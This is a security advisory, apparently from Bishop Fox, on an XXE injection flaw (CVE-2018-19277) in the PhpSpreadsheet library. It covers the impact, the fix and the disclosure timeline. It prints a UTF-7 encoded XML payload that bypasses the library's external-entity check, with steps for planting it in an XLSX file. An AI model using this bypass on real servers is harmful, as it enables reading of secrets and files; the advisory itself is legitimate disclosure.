PhpSpreadsheet Versions<=1.5.0 - XXE injection

Gauge showing high severity reading

Share

Product Description

PhpSpreadsheet is a library written in pure PHP that provides a set of classes allowing users to read from and write to different spreadsheet file formats, such as Excel and LibreOffice Calc.

Vulnerabilities List

One vulnerability was identified within the PhpSpreadsheet library. 

Affected Version

Versions <=1.5.0

Solution

Identify when the thread-safe libxmlDisableEntityLoader() function is available and disable the ability to load external entities when it is present. In addition, convert XML encoding to UTF-8 prior to performing a security scan.

This vulnerability is described in the following section.

XML External Entity (XXE) Injection 

The PhpSpreadsheet library is affected by XXE injection. This vulnerability could be leveraged to read files from a server that hosts an application using this library. An attacker who exploited this vulnerability could extract secrets, passwords, source code, and other sensitive data stored on the filesystem.

Vulnerability Details

CVE ID: CVE-2018-19277

Access Vector: Network 

Security Risk: High

Vulnerability: CWE-611

CVSS Base Score: 7.7

CVSS vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

The PhpSpreadsheet library implements a security check that halts XML processing if an external entity is detected. An attacker could bypass the check by encoding the XML data as UTF-7 with the following payload:

<?xml version="1.0" encoding="UTF-7"?>
<!DOCTYPE xmlrootname [<!ENTITY % aaa SYSTEM 
"http://127.0.0.1:8080/ext.dtd">%aaa;%ccc;%ddd;]>

The payload above can then be stored as a sheet in a .XLSX document. The attacker can then unzip the .XLSX document and replace the contents of the file xl/worksheets/sheet1.xml with the UTF-7 encoded payload. The document containing the new sheet can then be rezipped.

When the PhpSpreadsheet library processes the newly created .XLSX document, the library makes a request to the URL. http://127.0.0.1:8080/ext.dtd. A successful HTTP request means that the external entity was successfully processed.

Disclosure Timeline: 

  • 11/12/2018: Initial discovery for version 1.5.0
  • 11/20/2018: Security fix implemented in version 1.5.1

Researcher:

Alex Leahu, Senior Security Analyst at Bishop Fox 

Subscribe to Bishop Fox's Security Blog

Be first to learn about latest tools, advisories, and findings.


Alex leahu

About the author, Alex Leahu

Senior Security Analyst

Alex Leahu (CCENT, CCNA) is a Bishop Fox Alumnus who was a Senior Security Analyst. He focused on web application and network penetration testing.

More by Alex

This site uses cookies to provide you with a great user experience. By continuing to use our website, you consent to the use of cookies. To find out more about the cookies we use, please see our Privacy Policy.